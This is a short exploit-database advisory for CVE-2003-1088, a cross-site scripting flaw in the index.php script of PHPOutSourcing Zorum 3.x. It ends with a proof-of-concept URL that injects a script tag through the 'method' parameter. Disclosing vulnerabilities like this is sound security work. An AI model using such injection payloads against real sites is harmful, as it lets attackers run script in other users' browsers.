PHPOutSourcing Zorum 3.x - Cross-Site Scripting
| EKU-ID: 28473 | CVE: CVE-2003-1088;OSVDB-2390 | OSVDB-ID: |
| Author: G00db0y | Published: 2003-08-11 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28473 | CVE: CVE-2003-1088;OSVDB-2390 | OSVDB-ID: |
| Author: G00db0y | Published: 2003-08-11 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/8388/info
A cross-site scripting vulnerability has been reported in the index.php script of PHPOutSourcing Zorum. Because of this, an attacker may be able to execute HTML and script code in the browsers of target users in the security context of the site hosting the vulnerable script.
http://www.example.com/pathofzorum/index.php?method=<script>alert('test')
</script>